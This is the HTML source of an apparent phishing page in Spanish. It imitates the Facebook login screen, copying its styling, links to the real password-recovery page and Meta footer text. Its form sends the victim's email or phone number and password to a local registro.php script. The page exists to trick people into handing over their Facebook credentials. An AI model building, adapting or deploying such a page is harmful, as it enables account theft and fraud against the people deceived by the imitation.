<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>facebook</title>

    <style>
      body {
        background-color: #F3F2F2;
        margin: 0;
        padding: 0;
      }
      h1 {
        text-align: center;
        width: 50%;
        margin: auto;
        margin-top: 30px;
      }
      table {
        border: 2px solid white;
        padding: 20px 100px;
        margin-top: 10px;
        border-radius: 15px;
        background-color: white;
      }
      input {
        border: 2px solid #F3F2F2;
        border-radius: 8px;
        background: #DEDFFC;
        padding: 10px;
        font-size: 15px;
        width: 130%;
      }

      #enviar {
        font-size: 20px;
        width: 200%;
        background: blue;
        color: white;
        border: 2px solid blue;
        border-radius: 8px;
        cursor: pointer;
      }

      #imagen {
        display: flex;
        justify-content: center;
        padding: 10px;
        top: 50px;
        left: 50px;
      }

      footer {
        font-size: 13px;
      }

      #link {
        color: blue;
      }

      #crear {
        font-size: 20px;
        width: 110%;
        background: #05D805;
        color: white;
        border: 2px solid #04C604;
        border-radius: 8px;
        cursor: pointer;
      }
    </style>
  </head>
  <body>
    <form action="registro.php" name="" method="POST">
      <table border="0" align="center">
        
        <h1>Iniciar Sesion con Facebook</h1>
        <!-- NOMBRE Y APELLIDO -----------------------------------------------------
        <tr>
          <td>
            Nombre y Apellido:
          </td>
          <td>
            <label for="name"></label>
            <input type="text" name="nombre" id="name" required  />
          </td>
        </tr>
        ------------------------------------------------------------------------------->
        <tr>
          <td>
          </td>
          <td>
            <label for="user"></label>
            <input type="text" name="usuario" id="user" required  placeholder="Correo Electronico o Numero de Celular" />
          </td>
        </tr>
        <tr>
          <td>
          </td>
          <td>
            <label for="password"></label>
            <input type="password" name="contraseña" id="password"  required  placeholder="Contraseña" />
          </td>
        </tr>
        <!--<tr>
          <td>
            Repetir contraseña:
          </td>
          <td>
            <label for="rep_pasword"></label>
            <input type="pasword" name="rep_contraseña" id="rep_pasword"  required />
          </td>
        </tr>-->
        <tr>
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <tr>
          <td align="center">
            <input
              type="submit"
              name="enviar"
              id="enviar"
              value="Iniciar Sesion"
            />
            <a id="link" href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0"><p>¿Olvidaste tu contraseña?</p></a>
            <hr>
            <a href="https://www.facebook.com/?stype=lo&deoia=1&jlou=AffFspypQJkUi_lsCrgOIz5_Q1jvKc3iyPD8AyS-0ajh23tOoJpVDNVl6wV_CLYAChvwZdJp1Nr4bWBmJCnxh2lQWuVh686OkU-P65AHiXq2iw&smuh=19894&lh=Ac96OOSGhdiOWH57vnI"><input type="submit" name="" value="Crear cuenta nueva" id="crear"></a>
          </td>
        </tr>
      </table>
    </form>
  </body>

  <center>
  <footer>
    <br><br><br><br><br><br><br><br><br><br><br><br>
    Español
English (US)
Italiano
Português (Brasil)
Français (France)
Deutsch
日本語
中文(简体)
العربية
हिन्दी<br>
<hr>
RegistrarteIniciar sesiónMessengerFacebook LiteVideoLugaresJuegosMarketplaceMeta PayMeta StoreMeta QuestImagina con Meta AIInstagramThreadsRecaudaciones de fondosServiciosCentro de información de votaciónPolítica de privacidadCentro de privacidadGruposInformaciónCrear anuncioCrear páginaDesarrolladoresEmpleoCookiesOpciones de anunciosCondicionesAyudaSubir contactos y no usuariosConfiguraciónRegistro de actividad
Meta © 2024
  </footer>
</center>
</html>
